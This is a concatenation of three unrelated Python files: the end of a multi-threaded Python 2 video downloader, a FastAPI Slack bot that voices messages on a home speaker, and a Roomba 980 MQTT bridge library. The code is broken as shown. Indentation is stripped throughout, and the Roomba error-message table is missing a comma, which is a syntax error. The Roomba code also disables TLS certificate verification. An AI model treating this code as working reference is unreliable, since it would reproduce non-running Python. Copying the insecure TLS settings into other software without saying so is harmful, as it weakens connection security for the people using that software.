m['ssl-verifyresult'] = curl.getinfo(pycurl.SSL_VERIFYRESULT)
m['filetime'] = curl.getinfo(pycurl.INFO_FILETIME)
m['starttransfer-time'] = curl.getinfo(pycurl.STARTTRANSFER_TIME)
m['redirect-time'] = curl.getinfo(pycurl.REDIRECT_TIME)
m['redirect-count'] = curl.getinfo(pycurl.REDIRECT_COUNT)
m['http-connectcode'] = curl.getinfo(pycurl.HTTP_CONNECTCODE)
m['httpauth-avail'] = curl.getinfo(pycurl.HTTPAUTH_AVAIL)
m['proxyauth-avail'] = curl.getinfo(pycurl.PROXYAUTH_AVAIL)
m['os-errno'] = curl.getinfo(pycurl.OS_ERRNO)
m['num-connects'] = curl.getinfo(pycurl.NUM_CONNECTS)
m['ssl-engines'] = curl.getinfo(pycurl.SSL_ENGINES)
m['cookielist'] = curl.getinfo(pycurl.INFO_COOKIELIST)
m['lastsocket'] = curl.getinfo(pycurl.LASTSOCKET)
m['ftp-entry-path'] = curl.getinfo(pycurl.FTP_ENTRY_PATH)
print m
curl.close()
fp.close()
def progress(download_t, download_d, upload_t, upload_d):
print "Total to download", download_t
print "Total downloaded", download_d
if __name__ == "__main__":
link = "http://av.vimeo.com/88785/872/43263156.mp4?token=1380857094_352ec82d2d18242330104b3b12de4c5e"
url= link
response = 'http://sushruth.bits-goa.com/cyberboost.php?url='+ url
result = urllib2.urlopen(response)
html = result.read()
filesize = html.split('Content-Length: ')[1]
filesize = filesize.split('\n')[0]
print filesize
length= filesize
filename = link.split('?')[0]
filename = filename.split('/')[-1]
print filename
i=1
thread1= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", "0", str(int(((int(length)/6))*i))])
i=i+1
thread2= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread3=Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread4= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread5=Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread6= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(length)])
thread1.start()
#time.sleep(5)
thread2.start()
#time.sleep(5)
thread3.start()
#time.sleep(5)
thread4.start()
#time.sleep(5)
thread5.start()
#time.sleep(5)
thread6.start()
#time.sleep(5)
jo()
print "thread finished...exiting"
file = open(filename, 'ab')
for i in range(1,7) :
file2 = open(filename+str(i)+'.dat', 'rb')
file.write(file2.read())
file2.close()
file.close()
|
myhome.py
|
# coding: utf-8
import uvicorn
import os, subprocess, shlex, asyncio, json
from dotenv import load_dotenv
from src.aquestalk_util import romajiToKana
import threading
from fastapi import FastAPI
from starlette.requests import Request
import requests
from pydantic import BaseModel
from fastapi.encoders import jsonable_encoder
load_dotenv()
SLACK_BOT_TOKEN = os.environ["SLACK_BOT_TOKEN"]
SLACK_SPEAKER_CHANNEL_TOKEN = os.environ["SLACK_SPEAKER_CHANNEL_TOKEN"]
APP_HOME_VIEW = {
"type": "home",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "ようこそ!ここはHomeSpeakerのApp Homeです."
}
},
{
"type": "divider"
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "*使用可能なコマンド*"
}
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "`/say [メッセージ]`: メッセージを伝えるとき"
}
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "`/go [地名]`: 家に帰るとき"
}
}
]
}
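# APP_HOME_VIEW above is the Slack App Home layout; the (Japanese) block texts
# greet the user and list the available slash commands: /say [message] and /go [place].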
app = FastAPI()
print("Start server...")
class SlackCommand(BaseModel):
token: str
team_id: str
team_domain: str
channel_id: str
channel_name: str
user_id: str
user_name: str
command: str
text: str
response_url: str
trigger_id: str
api_app_id: str
# post response to Slack App Home
def viewsPublish(user: str, view):
url = "https://slack.com/api/views.publish"
payload = {"token": SLACK_BOT_TOKEN, "user_id": user, "view": view}
headers = {"Content-type": "application/json; charset=UTF-8", "Authorization": "Bearer " + SLACK_BOT_TOKEN}
r = requests.post(url, data=json.dumps(payload), headers=headers)
# post response to Slack channel
def postSpeakerChannel(message: str):
url = SLACK_SPEAKER_CHANNEL_TOKEN
payload = {"text": message}
r = requests.post(url, data=json.dumps(payload))
def makePostText(cmdName: str):
return cmdName + "リクエストを受け付けました"
# speaker
def say(msg, symbol=True):
speed = "100"
    if symbol:  # whether to speak using AquesTalk phonetic (kana) symbol strings (default: on)
cmd1 = "AquesTalkPi -s " + speed + " -k \"" + msg + "\""
else:
cmd1 = "AquesTalkPi -s " + speed + " \"" + msg + "\""
cmd2 = "aplay -D plughw:1,0"
process1=subprocess.Popen(shlex.split(cmd1),stdout=subprocess.PIPE)
process2=subprocess.Popen(shlex.split(cmd2),stdin=process1.stdout)
process2.wait()
def aplay(wavfile):
cmd = "aplay -D plughw:1,0 " + wavfile
proc = subprocess.call( cmd.strip().split(" ") )
# gohome
def sayGohome(userName: str, location: str):
sentence1 = "い'まから,/;" + romajiToKana(userName) + "さんがか'えってきま_ス."
sentence2 = "ただ'いま、" + location + "にいま_ス."
aplay("res/notice.wav")
say(sentence1)
if len(location) > 0:
say(sentence2)
def makeGohomeText(userName: str, location: str):
message = f"いまからかえります"
if len(location) > 0:
message += f" @{location}"
message += f" from {userName}"
return message
# say
def saySomething(userName: str, message: str):
sentence = romajiToKana(userName) + "さん,からのめっせーじです."
sentence += message
aplay("res/notice.wav")
say(sentence, False)
def makeSayText(userName: str, text: str):
message = f"{userName}さんからのメッセージ:\n"
message += text
return message
# post request
@app.post("/myhome/api/v1/gohome",
status_code=200)
async def gohome_cmd(req: Request):
body = await req.form()
cmd = SlackCommand(**body)
    # Pass the callable and its arguments separately; calling the function inline
    # would run it synchronously and hand Thread a None target.
    postThread = threading.Thread(target=postSpeakerChannel, args=(makeGohomeText(cmd.user_name, cmd.text),))
    sayThread = threading.Thread(target=sayGohome, args=(cmd.user_name, cmd.text))
postThread.start()
sayThread.start()
return {"text": makePostText("gohome")}
@app.post("/myhome/api/v1/say",
status_code=200)
async def say_cmd(req: Request):
body = await req.form()
cmd = SlackCommand(**body)
    postThread = threading.Thread(target=postSpeakerChannel, args=(makeSayText(cmd.user_name, cmd.text),))
    sayThread = threading.Thread(target=saySomething, args=(cmd.user_name, cmd.text))
postThread.start()
sayThread.start()
return {"text": makePostText("say")}
@app.post("/myhome/api/v1/apphome",
status_code=200)
async def get_apphome(req: Request):
body = await req.json()
type = body["type"]
if type == "url_verification":
return {"challenge": body["challenge"]}
if type == "event_callback":
event = body["event"]
if (event["type"] == "app_home_opened"):
viewsPublish(event["user"], APP_HOME_VIEW)
@app.post("/myhome/api/v1/actions",
status_code=200)
async def actions(req: Request):
body = await req.form()
print(body["payload"])
    payload = body["payload"]
"""
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=13241)
"""
|
roomba.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Python 2.7/Python 3.5/3.6 (thanks to pschmitt for adding Python 3 compatibility)
Program to connect to Roomba 980 vacuum cleaner, decode json, and forward to mqtt
server
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3.2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allowing
enabling/disabling of room outline drawing, added auto creation of css/html files
Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room outlines
if you don't have OpenCV
Nick Waterton 3rd Feb 2018 V1.2.2: Quick (untested) fix for running directly (ie not installed)
Nick Waterton 12th April 2018 V1.2.3: Fixed image rotation bug causing distorted maps if map rotation was not 0.
Nick Waterton 21st Dec 2018 V1.2.4: Fixed problem with findContours with OpenCV V4. Note V4.0.0-alpha still returns 3 values, and so won't work.
Nick Waterton 7th Oct 2019 V1.2.5: changed PROTOCOL_TLSv1 to PROTOCOL_TLS to fix i7 connection problem after F/W upgrade.
Nick Waterton 12th Nov 2019 V1.2.6: added set_ciphers('DEFAULT@SECLEVEL=1') to ssl context to work around dh_key_too_small error.
Nick Waterton 14th Jan 2020 V1.2.7: updated error code list.
'''
from __future__ import print_function
from __future__ import absolute_import
__version__ = "1.2.7"
from ast import literal_eval
from collections import OrderedDict
try:
    from collections.abc import Mapping   # Python 3.3+
except ImportError:                        # Python 2.7
    from collections import Mapping
try:
from roomba.password import Password
except ImportError:
from password import Password
import datetime
import json
import math
import logging
import os
import six
import socket
import ssl
import sys
import threading
import time
import traceback
try:
import configparser
except ImportError:
from six.moves import configparser
# Import trickery
global HAVE_CV2
global HAVE_MQTT
global HAVE_PIL
HAVE_CV2 = False
HAVE_MQTT = False
HAVE_PIL = False
try:
import paho.mqtt.client as mqtt
HAVE_MQTT = True
except ImportError:
print("paho mqtt client not found")
try:
import cv2
import numpy as np
HAVE_CV2 = True
except ImportError:
print("CV or numpy module not found, falling back to PIL")
# NOTE: MUST use Pillow Pillow 4.1.1 or above to avoid some horrible memory leaks in the
# text handling!
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps
HAVE_PIL = True
except ImportError:
print("PIL module not found, maps are disabled")
# On Python 3 raw_input was renamed to input
try:
input = raw_input
except NameError:
pass
class Roomba(object):
'''
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980
username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered)
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
    The values received from the Roomba are stored in a dictionary called
master_state, and can be accessed at any time, the contents are live, and
will build with time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
'''
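    # A minimal usage sketch (hypothetical address/credentials; MQTT forwarding
    # and map drawing are optional):
    #   myroomba = Roomba(address='192.168.1.100', blid='BLID', password='PASSWORD')
    #   myroomba.connect()
    #   myroomba.send_command("start")                    # e.g. "start", "stop", "dock"
    #   myroomba.set_preference("carpetBoost", "true")    # example preference name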
VERSION = "1.1"
states = {"charge": "Charging",
"new": "New Mission",
"run": "Running",
"resume": "Running",
"hmMidMsn": "Recharging",
"recharge": "Recharging",
"stuck": "Stuck",
"hmUsrDock": "User Docking",
"dock": "Docking",
"dockend": "Docking - End Mission",
"cancelled": "Cancelled",
"stop": "Stopped",
"pause": "Paused",
"hmPostMsn": "End Mission",
"": None}
# From http://homesupport.irobot.com/app/answers/detail/a_id/9024/~/roomba-900-error-messages
_ErrorMessages_old = {
0: "None",
1: "Roomba is stuck with its left or right wheel hanging down.",
2: "The debris extractors can't turn.",
5: "The left or right wheel is stuck.",
6: "The cliff sensors are dirty, it is hanging over a drop, "\
"or it is stuck on a dark surface.",
8: "The fan is stuck or its filter is clogged.",
9: "The bumper is stuck, or the bumper sensor is dirty.",
10: "The left or right wheel is not moving.",
11: "Roomba has an internal error.",
14: "The bin has a bad connection to the robot.",
15: "Roomba has an internal error.",
16: "Roomba has started while moving or at an angle, or was bumped "\
"while running.",
17: "The cleaning job is incomplete.",
18: "Roomba cannot return to the Home Base or starting position."
}
# from decoding app
_ErrorMessages = {
0: "None",
1: "Left wheel off floor",
2: "Main Brushes stuck",
3: "Right wheel off floor",
4: "Left wheel stuck",
5: "Right wheel stuck",
6: "Stuck near a cliff",
7: "Left wheel error",
8: "Bin error",
9: "Bumper stuck",
10: "Right wheel error",
11: "Bin error",
12: "Cliff sensor issue",
13: "Both wheels off floor",
14: "Bin missing",
15: "Reboot required",
16: "Bumped unexpectedly",
17: "Path blocked",
18: "Docking issue"
19: "Undocking issue",
20: "Docking issue",
21: "Navigation problem",
22: "Navigation problem",
23: "Battery issue",
24: "Navigation problem",
25: "Reboot required",
26: "Vacuum problem",
27: "Vacuum problem",
29: "Software update needed",
30: "Vacuum problem",
31: "Reboot required",
32: "Smart map problem",
33: "Path blocked",
34: "Reboot required",
35: "Unrecognised cleaning pad",
36: "Bin full",
37: "Tank needed refilling",
38: "Vacuum problem",
39: "Reboot required",
40: "Navigation problem",
41: "Timed out",
42: "Localization problem",
43: "Navigation problem",
44: "Pump issue",
45: "Lid open",
46: "Low battery",
47: "Reboot required",
48: "Path blocked",
52: "Pad required attention",
65: "Hardware problem detected",
66: "Low memory",
68: "Hardware problem detected",
73: "Pad type changed",
74: "Max area reached",
75: "Navigation problem",
76: "Hardware problem detected"
}
def __init__(self, address=None, blid=None, password=None, topic="#",
continuous=True, clean=False, cert_name="", roombaName="",
file="./config.ini"):
'''
address is the IP address of the Roomba, the continuous flag enables a
continuous mqtt connection, if this is set to False, the client connects
and disconnects every 'delay' seconds (1 by default, but can be
changed). This is to allow other programs access, as there can only be
one Roomba connection at a time.
        As cloud connections are unaffected, I recommend leaving this as True.
leave topic as is, unless debugging (# = all messages).
if a python standard logging object exists, it will be used for logging.
'''
self.debug = False
self.log = logging.getLogger("roomba.__main__") #modified to work with new scheme NW 15/9/2017
#self.log = logging.getLogger(__name__+'.Roomba')
if self.log.getEffectiveLevel() == logging.DEBUG:
self.debug = True
self.address = address
if not cert_name:
self.cert_name = "/etc/ssl/certs/ca-certificates.crt"
else:
self.cert_name = cert_name
self.continuous = continuous
if self.continuous:
self.log.info("CONTINUOUS connection")
else:
self.log.info("PERIODIC connection")
# set the following to True to enable pretty printing of json data
self.pretty_print = False
self.stop_connection = False
self.periodic_connection_running = False
self.clean = clean
self.roomba_port = 8883
self.blid = blid
self.password = password
self.roombaName = roombaName
self.topic = topic
self.mqttc = None
self.exclude = ""
self.delay = 1
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.raw = False
self.drawmap = False
self.previous_co_ords = self.co_ords = self.zero_coords()
self.fnt = None
self.home_pos = None
self.angle = 0
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.last_completed_time = None
self.bin_full = False
self.base = None #base map
self.dock_icon = None #dock icon
self.roomba_icon = None #roomba icon
self.roomba_cancelled_icon = None #roomba cancelled icon
self.roomba_battery_icon = None #roomba battery low icon
self.roomba_error_icon = None #roomba error icon
self.bin_full_icon = None #bin full icon
self.room_outline_contour = None
self.room_outline = None
self.transparent = (0, 0, 0, 0) #transparent
self.previous_display_text = self.display_text = None
self.master_state = {}
self.time = time.time()
self.update_seconds = 300 #update with all values every 5 minutes
self.show_final_map = True
self.client = None
if self.address is None or blid is None or password is None:
self.read_config_file(file)
def read_config_file(self, file="./config.ini"):
#read config file
Config = configparser.ConfigParser()
try:
Config.read(file)
except Exception as e:
self.log.warn("Error reading config file %s" %e)
self.log.info("No Roomba specified, and no config file found - "
"attempting discovery")
if Password(self.address, file):
return self.read_config_file(file)
else:
return False
self.log.info("reading info from config file %s" % file)
addresses = Config.sections()
if self.address is None and len(addresses):
if len(addresses) > 1:
self.log.warn("config file has entries for %d Roombas, "
"only configuring the first!")
self.address = addresses[0]
if self.address:
self.blid = Config.get(self.address, "blid")
self.password = Config.get(self.address, "password")
else:
self.log.warn("Error reading config file %s" % file)
return False
# self.roombaName = literal_eval(
# Config.get(self.address, "data"))["robotname"]
return True
def setup_client(self):
if self.client is None:
if not HAVE_MQTT:
print("Please install paho-mqtt 'pip install paho-mqtt' "
"to use this library")
return False
self.client = mqtt.Client(
client_id=self.blid, clean_session=self.clean,
protocol=mqtt.MQTTv311)
# Assign event callbacks
self.client.on_message = self.on_message
self.client.on_connect = self.on_connect
self.client.on_publish = self.on_publish
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
# Uncomment to enable debug messages
# client.on_log = self.on_log
# set TLS, self.cert_name is required by paho-mqtt, even if the
# certificate is not used...
# but v1.3 changes all this, so have to do the following:
self.log.info("Setting TLS")
try:
self.client.tls_set(
self.cert_name, cert_reqs=ssl.CERT_NONE,
tls_version=ssl.PROTOCOL_TLS, ciphers='DEFAULT@SECLEVEL=1')
except (ValueError, FileNotFoundError): # try V1.3 version
self.log.warn("TLS Setting failed - trying 1.3 version")
self.client._ssl_context = None
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_NONE
context.load_default_certs()
context.set_ciphers('DEFAULT@SECLEVEL=1') # NW added 12/11/2019
self.client.tls_set_context(context)
except:
self.log.error("Error setting TLS: %s" % traceback.format_exc())
# disables peer verification
self.client.tls_insecure_set(True)
self.client.username_pw_set(self.blid, self.password)
self.log.info("Setting TLS - OK")
return True
return False
def connect(self):
if self.address is None or self.blid is None or self.password is None:
self.log.critical("Invalid address, blid, or password! All these "
"must be specified!")
sys.exit(1)
if self.roomba_connected or self.periodic_connection_running: return
if self.continuous:
if not self._connect():
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
else:
self._thread = threading.Thread(target=self.periodic_connection)
self._thread.daemon = True
self._thread.start()
self.time = time.time() #save connect time
def _connect(self, count=0, new_connection=False):
max_retries = 3
try:
if self.client is None or new_connection:
self.log.info("Connecting %s" % self.roombaName)
self.setup_client()
self.client.connect(self.address, self.roomba_port, 60)
else:
self.log.info("Attempting to Reconnect %s" % self.roombaName)
self.client.loop_stop()
self.client.reconnect()
self.client.loop_start()
return True
except Exception as e:
self.log.error("Error: %s " % e)
exc_type, exc_obj, exc_tb = sys.exc_info()
# self.log.error("Exception: %s" % exc_type)
# if e[0] == 111: #errno.ECONNREFUSED - does not work with
# python 3.0 so...
if exc_type == socket.error or exc_type == ConnectionRefusedError:
count += 1
if count <= max_retries:
self.log.error("Attempting new Connection# %d" % count)
time.sleep(1)
self._connect(count, True)
if count == max_retries:
self.log.error("Unable to connect %s" % self.roombaName)
return False
def disconnect(self):
if self.continuous:
self.client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running: return
self.periodic_connection_running = True
while not self.stop_connection:
if self._connect():
time.sleep(self.delay)
self.client.disconnect()
time.sleep(self.delay)
self.client.disconnect()
self.periodic_connection_running = False
def on_connect(self, client, userdata, flags, rc):
self.log.info("Roomba Connected %s" % self.roombaName)
if rc == 0:
self.roomba_connected = True
self.client.subscribe(self.topic)
else:
self.log.error("Roomba Connected with result code " + str(rc))
self.log.error("Please make sure your blid and password are "
"correct %s" % self.roombaName)
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
def on_message(self, mosq, obj, msg):
# print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic,msg.payload)
self.dict_merge(self.master_state, json_data)
if self.pretty_print:
self.log.info("%-{:d}s : %s".format(self.master_indent)
% (msg.topic,log_string))
else:
self.log.info("Received Roomba Data %s: %s, %s"
% (self.roombaName, str(msg.topic), str(msg.payload)))
if self.raw:
self.publish(msg.topic, msg.payload)
else:
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.info("Publishing master_state %s" % self.roombaName)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
def on_publish(self, mosq, obj, mid):
pass
def on_subscribe(self, mosq, obj, mid, granted_qos):
self.log.debug("Subscribed: %s %s" % (str(mid), str(granted_qos)))
def on_disconnect(self, mosq, obj, rc):
self.roomba_connected = False
if rc != 0:
self.log.warn("Unexpected Disconnect From Roomba %s! - reconnecting"
% self.roombaName)
else:
self.log.info("Disconnected From Roomba %s" % self.roombaName)
def on_log(self, mosq, obj, level, string):
self.log.info(string)
def set_mqtt_client(self, mqttc=None, brokerFeedback=""):
self.mqttc = mqttc
if self.mqttc is not None:
if self.roombaName != "":
self.brokerFeedback = brokerFeedback + "/" + self.roombaName
else:
self.brokerFeedback = brokerFeedback
def send_command(self, command):
self.log.info("Received COMMAND: %s" % command)
Command = OrderedDict()
Command["command"] = command
Command["time"] = self.totimestamp(datetime.datetime.now())
Command["initiator"] = "localApp"
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Command : %s" % myCommand)
self.client.publish("cmd", myCommand)
def set_preference(self, preference, setting):
self.log.info("Received SETTING: %s, %s" % (preference, setting))
val = False
if setting.lower() == "true":
val = True
tmp = {preference: val}
Command = {"state": tmp}
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Setting : %s" % myCommand)
self.client.publish("delta", myCommand)
def publish(self, topic, message):
if self.mqttc is not None and message is not None:
self.log.debug("Publishing item: %s: %s"
% (self.brokerFeedback + "/" + topic, message))
self.mqttc.publish(self.brokerFeedback + "/" + topic, message)
def set_options(self, raw=False, indent=0, pretty_print=False):
self.raw = raw
self.indent = indent
self.pretty_print = pretty_print
if self.raw:
self.log.info("Posting RAW data")
else:
self.log.info("Posting DECODED data")
def enable_map(self, enable=False, mapSize="(800,1500,0,0,0,0)",
mapPath=".", iconPath = "./", roomOutline=True,
enableMapWithText=True,
fillColor="lawngreen",
outlineColor=(64,64,64,255),
outlineWidth=1,
home_icon_file="home.png",
roomba_icon_file="roomba.png",
roomba_error_file="roombaerror.png",
roomba_cancelled_file="roombacancelled.png",
roomba_battery_file="roomba-charge.png",
bin_full_file="binfull.png",
roomba_size=(50,50), draw_edges = 30, auto_rotate=True):
'''
Enable live map drawing. mapSize is x,y size, x,y offset of docking
station ((0,0) is the center of the image) final value is map rotation
(in case map is not straight up/down). These values depend on the
size/shape of the area Roomba covers. Offset depends on where you place
the docking station. This will need some experimentation to get right.
You can supply 32x32 icons for dock and roomba etc. If the files don't
exist, crude representations are made. If you specify home_icon_file as
None, then no dock is drawn. Draw edges attempts to draw straight lines
around the final (not live) map, and Auto_rotate (on/off) attempts to
line the map up vertically. These only work if you have openCV
installed. otherwise a PIL version is used, which is not as good (but
less CPU intensive). roomOutline enables the previous largest saved
outline to be overlayed on the map (so you can see where cleaning was
missed). This is on by default, but the alignment doesn't work so well,
so you can turn it off.
Returns map enabled True/False
'''
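        # Example call (hypothetical sizes/paths):
        #   roomba.enable_map(enable=True, mapSize="(2000,1800,0,-300,0,0)",
        #                     mapPath="/var/www/html", iconPath="./icons")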
if not HAVE_PIL: #can't draw a map without PIL!
return False
if Image.PILLOW_VERSION < "4.1.1":
print("WARNING: PIL version is %s, this is not the latest! you "
"can get bad memory leaks with old versions of PIL"
% Image.PILLOW_VERSION)
print("run: 'pip install --upgrade pillow' to fix this")
self.drawmap = enable
if self.drawmap:
self.log.info("MAP: Maps Enabled")
self.mapSize = literal_eval(mapSize)
            if len(self.mapSize) < 6:
                self.log.error("mapSize is required, and is of the form "
                               "(800,1500,0,0,0,0) - (x,y size, x,y dock loc, "
                               "theta1, theta2) - map and roomba rotation")
self.drawmap = False
return False
self.angle = self.mapSize[4]
self.roomba_angle = self.mapSize[5]
self.mapPath = mapPath
if home_icon_file is None:
self.home_icon_file = None
else:
self.home_icon_file = os.path.join(iconPath, home_icon_file)
self.roomba_icon_file = os.path.join(iconPath, roomba_icon_file)
self.roomba_error_file = os.path.join(iconPath, roomba_error_file)
self.roomba_cancelled_file = os.path.join(iconPath, roomba_cancelled_file)
self.roomba_battery_file = os.path.join(iconPath, roomba_battery_file)
self.bin_full_file = os.path.join(iconPath, bin_full_file)
            self.draw_edges = draw_edges / 10000  # e.g. 30 -> 0.003 (0.3% of perimeter); integer division would give 0
self.auto_rotate = auto_rotate
if not roomOutline:
self.log.info("MAP: Not drawing Room Outline")
self.roomOutline = roomOutline
self.enableMapWithText = enableMapWithText
self.fillColor = fillColor
self.outlineColor = outlineColor
self.outlineWidth = outlineWidth
self.initialise_map(roomba_size)
return True
return False
def totimestamp(self, dt):
td = dt - datetime.datetime(1970, 1, 1)
return int(td.total_seconds())
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in six.iteritems(merge_dct):
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def decode_payload(self, topic, payload):
'''
        Format json for pretty printing, return string suitable for logging,
and a dict of the json data
'''
indent = self.master_indent + 31 #number of spaces to indent json data
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8").replace(":nan", ":NaN").\
replace(":inf", ":Infinity").replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join((indent * " ") + i for i in \
(json.dumps(json_data, indent = 2)).splitlines())
formatted_data = "Decoded JSON: \n%s" % (json_data_string)
except ValueError:
formatted_data = payload
if self.raw:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
'''
decode json data dict, and publish as individual topics to
        brokerFeedback/topic. The keys are concatenated with _ to make one unique
        topic name. Strings are expressly converted to str to avoid unicode
representations
'''
for k, v in six.iteritems(state):
if isinstance(v, dict):
if prefix is None:
self.decode_topics(v, k)
else:
self.decode_topics(v, prefix+"_"+k)
else:
if isinstance(v, list):
newlist = []
for i in v:
if isinstance(i, dict):
for ki, vi in six.iteritems(i):
newlist.append((str(ki), vi))
else:
if isinstance(i, six.string_types):
i = str(i)
newlist.append(i)
v = newlist
if prefix is not None:
k = prefix+"_"+k
# all data starts with this, so it's redundant
k = k.replace("state_reported_","")
# save variables for drawing map
if k == "pose_theta":
self.co_ords["theta"] = v
if k == "pose_point_x": #x and y are reversed...
self.co_ords["y"] = v
if k == "pose_point_y":
self.co_ords["x"] = v
if k == "bin_full":
self.bin_full = v
if k == "cleanMissionStatus_error":
try:
self.error_message = self._ErrorMessages[v]
except KeyError as e:
self.log.warn(
"Error looking up Roomba error message %s" % e)
self.error_message = "Unknown Error number: %s" % v
self.publish("error_message", self.error_message)
if k == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
self.cleanMissionStatus_phase = v
self.publish(k, str(v))
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state = None):
'''
Roomba progresses through states (phases), current identified states
are:
"" : program started up, no state yet
"run" : running on a Cleaning Mission
"hmUsrDock" : returning to Dock
"hmMidMsn" : need to recharge
"hmPostMsn" : mission completed
"charge" : chargeing
"stuck" : Roomba is stuck
"stop" : Stopped
"pause" : paused
available states:
states = { "charge":"Charging",
"new":"New Mission",
"run":"Running",
"resume":"Running",
"hmMidMsn":"Recharging",
"recharge":"Recharging",
"stuck":"Stuck",
"hmUsrDock":"User Docking",
"dock":"Docking",
"dockend":"Docking - End Mission",
"cancelled":"Cancelled",
"stop":"Stopped",
"pause":"Paused",
"hmPostMsn":"End Mission",
"":None}
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize map, and end of mission to
finalise map.
Assume charge -> run = start of mission (init map)
stuck - > charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
'''
current_mission = self.current_state
#if self.current_state == None: #set initial state here for debugging
# self.current_state = self.states["recharge"]
# self.show_final_map = False
# deal with "bin full" timeout on mission
try:
if (self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"] == "none" and
self.cleanMissionStatus_phase == "charge" and
(self.current_state == self.states["pause"] or
self.current_state == self.states["recharge"])):
self.current_state = self.states["cancelled"]
except KeyError:
pass
if (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["new"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "hmMidMsn"):
self.current_state = self.states["dock"]
elif (self.current_state == self.states["dock"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"] and
self.cleanMissionStatus_phase == "charge" and self.bin_full):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["recharge"]
elif (self.current_state == self.states["recharge"]
and self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["pause"]
elif (self.current_state == self.states["pause"]
and self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "charge"):
# so that we will draw map and can update charge status
current_mission = None
elif ((self.current_state == self.states["stop"] or
self.current_state == self.states["pause"]) and
self.cleanMissionStatus_phase == "hmUsrDock"):
self.current_state = self.states["cancelled"]
elif ((self.current_state == self.states["hmUsrDock"] or
self.current_state == self.states["cancelled"]) and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["hmPostMsn"] and
self.cleanMissionStatus_phase == "charge"):
self.current_state = self.states["dockend"]
elif (self.current_state == self.states["dockend"] and
self.cleanMissionStatus_phase == "charge"):
